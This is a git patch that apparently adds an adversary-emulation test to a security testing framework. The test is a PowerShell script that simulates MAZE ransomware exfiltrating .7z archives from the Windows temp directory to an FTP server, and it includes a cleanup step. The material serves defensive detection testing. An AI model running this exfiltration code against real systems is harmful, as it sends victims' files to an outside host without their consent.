From df1f3bf6cedc645f7264bc5371343533ce5d0fcf Mon Sep 17 00:00:00 2001
From: Leo Verlod <96517806+Leomon5@users.noreply.github.com>
Date: Tue, 17 May 2022 11:51:09 -0500
Subject: [PATCH] Create T1560.003 Test 1 (#1967)

* Create T1560.003 test 1

* Add T1048.003 Test 6

* Delete T1560.003 (moved to T1048.003

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1048.003/T1048.003.yaml | 42 ++++++++++++++++++++++++++++++++
 1 file changed, 42 insertions(+)

diff --git a/atomics/T1048.003/T1048.003.yaml b/atomics/T1048.003/T1048.003.yaml
index a191cb14..d49ea113 100644
--- a/atomics/T1048.003/T1048.003.yaml
+++ b/atomics/T1048.003/T1048.003.yaml
@@ -116,3 +116,45 @@ atomic_tests:
       description: SMTP server to use for email transportation
       type: String
       default: "127.0.0.1"
+- name: MAZE FTP Upload
+  description: |
+    This test simulates MAZE's ransomware's ability to exfiltrate data via FTP.
+    Upon successful execution, all 7z files within the %windir%\temp directory will be uploaded to a remote FTP server. 
+    Reference: https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents
+  supported_platforms:
+  - windows
+  input_arguments:
+    ftp_server:
+      description: FTP Server address
+      type: String
+      default: 127.0.0.1
+    username:
+      description: Username for FTP server login
+      type: String
+      default:
+    password:
+      description: Password for FTP server login
+      type: String
+      default:
+  executor:
+    command: |
+      $Dir_to_copy = "$env:windir\temp"
+      $ftp = "ftp://#{ftp_server}/"
+      $web_client = New-Object System.Net.WebClient
+      $web_client.Credentials = New-Object System.Net.NetworkCredential('#{username}', '#{password}')
+      if (test-connection -count 1 -computername "#{ftp_server}" -quiet)
+      {foreach($file in (dir $Dir_to_copy "*.7z"))
+      {echo "Uploading $file..."
+      $uri = New-Object System.Uri($ftp+$file.name)
+      $web_client.UploadFile($uri, $file.FullName)}}
+      else
+      {echo "FTP Server Unreachable. Please verify the server address in input args and try again."}
+    cleanup_command: |
+     $ftp = "ftp://#{ftp_server}/"
+     try {foreach ($file in (dir "$env:windir\temp" "*.7z"))
+     {$uri = New-Object System.Uri($ftp+$file.name)
+      $ftp_del = [System.Net.FtpWebRequest]::create($uri)
+      $ftp_del.Credentials = New-Object System.Net.NetworkCredential('#{username}','#{password}')
+      $ftp_del.Method = [System.Net.WebRequestMethods+Ftp]::DeleteFile
+      $ftp_del.GetResponse()}} catch{}
+    name: powershell